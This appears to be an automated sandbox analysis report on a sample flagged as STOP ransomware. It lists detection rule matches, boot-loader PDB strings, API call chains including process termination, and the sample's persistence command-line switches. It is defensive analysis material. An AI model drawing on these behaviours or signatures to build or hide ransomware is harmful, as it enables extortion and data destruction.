              Source: 00000006.00000000.1827821890.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000004.00000000.1745267014.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000004.00000002.1757288854.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000000.00000003.1658712318.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000006.00000000.1827888819.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000000.00000000.1646052396.0000000000461000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000006.00000002.1839495564.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000004.00000000.1745023046.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7476, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7568, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7620, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7708, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7868, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: DROPPEDMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: DROPPEDMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\block.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nkp.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\usb.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\tcglib.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\guiddef.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\diskapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\sdiapi.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blockapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uwfapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\locate.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\disk.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\sdiapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blktable.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blocksup.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uwfapi.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramapi.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\debugport.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\debugport.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fve.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fvelog.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fveretailunlock.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blktable.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udp.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\seccmd.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uriapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fveretailunlock.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fvelog.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhdutil.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbusapi.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blockapi.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vdiskapi.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\seccmd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fileapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\serialapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramdiskvhd.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fve.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\device.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\edriveapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbusapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nbp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nkp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\usb.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blkcache.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\disk.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\locate.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\block.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\edriveapi.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fileapi.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\device.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\serialapi.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbus.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbus.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\devlog.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd2.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blocksup.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partition.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blkcache.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uriapi.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\guiddef.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\tcglib.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramdiskvhd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vdiskapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\devlog.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhdutil.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd2.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partapi.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udpapi.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udpapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partition.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nbp.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\diskapi.obj
              Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd.obj
              Source: classification engineClassification label: mal100.rans.spre.troj.evad.winEXE@8/1287@4/2
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00471900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,0_2_00471900
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00472440 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,0_2_00472440
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0046D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,0_2_0046D240
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\geo[1].jsonJump to behavior
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --Admin0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: IsAutoStart0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: IsTask0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --ForNetRes0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: IsAutoStart0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: IsTask0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --Task0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --AutoStart0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --Service0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: X1V0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: --Admin0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: x2W0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: x*V0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: C:\Windows\0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: D:\Windows\0_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCommand line argument: 7V0_2_00479F90
